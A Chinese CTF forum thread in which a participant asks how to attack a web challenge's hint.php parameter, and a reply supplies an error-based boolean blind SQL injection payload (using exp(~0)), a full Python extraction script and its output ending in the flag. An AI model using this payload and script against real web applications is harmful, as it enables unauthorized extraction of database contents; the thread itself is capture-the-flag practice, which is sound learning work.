CTF论坛 - CTF交流社区

[CTF问题] 求教一份web题目

2018-12-4 01:30
1652
http://124.16.75.162:40006
看到有:http://124.16.75.162:40006/hint.php?id=1

猜测是注入,没有看到回显,测试延时注入发现sleep等也被过滤了,也试了get_lock 不知道为什么不可以,有没有师傅会的呢。。。


分享到 :
0 人收藏

2 个回复

倒序浏览
leixiao  小有名气 | 5 天前
求告知这是哪里的题?
leixiao  小有名气 | 5 天前
只会提示sql语句语法正不正确,所以同时利用报错函数和布尔盲注
payload:
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,1))%3E1,1,exp(~0))--+


贴上我的脚本
  1. #-*- coding: utf-8 -*-

  2. import requests
  3. import re

  4. requests=requests.session()

  5. strall=[]
  6. strall.append('0')
  7. for i in range(33,128):
  8.     strall.append(str(i))


  9. def isthis(index,charascii,compare):
  10.     headers={
  11.         'Host': '124.16.75.162:40006',
  12.                 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0',
  13.                 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
  14.                 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
  15.                 'Connection': 'close',
  16.                 'Upgrade-Insecure-Requests': '1'
  17.     }
  18.     url="http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,{}))".format(str(34-index))+compare+"{},1,exp(~0))--+".format(charascii)
  19.     print url

  20.     r=requests.get(url=url,headers=headers)

  21.     a=True

  22.     if r.text.find('sql')>=0:
  23.         print 'false'
  24.         a=False
  25.     else:
  26.         print 'true'
  27.         a=True

  28.     return a
  29.         



  30. ans=''
  31. flag=0
  32. for index in range(1,99):
  33.     left=0
  34.     right=len(strall)
  35.     if flag:
  36.         break

  37.     while left<=right:
  38.         mid=(left+right)>>1
  39.         if isthis(index,strall[mid],">"):
  40.             left=mid+1
  41.         elif isthis(index,strall[mid],"<"):
  42.             right=mid-1
  43.         else:
  44.             if strall[mid]=='0':
  45.                 flag=1
  46.                 break
  47.             value=chr(int(strall[mid]))
  48.             ans+=value
  49.             print ans
  50.             break

  51. print ans




  52. raw_input('done')

复制代码


发不了截图,就copy一下脚本最后的运行情况,,,
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<43,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>37,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<37,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>34,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<34,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>0,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<0,1,exp(~0))--+
false
flag{read_more_to_get_admin_pass}
done
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Echocipher

炉火纯青

积分: 202 帖子: 5 精华: 0

Powered by Bugku! X3.4 © 2017 CTFbbs.

返回顶部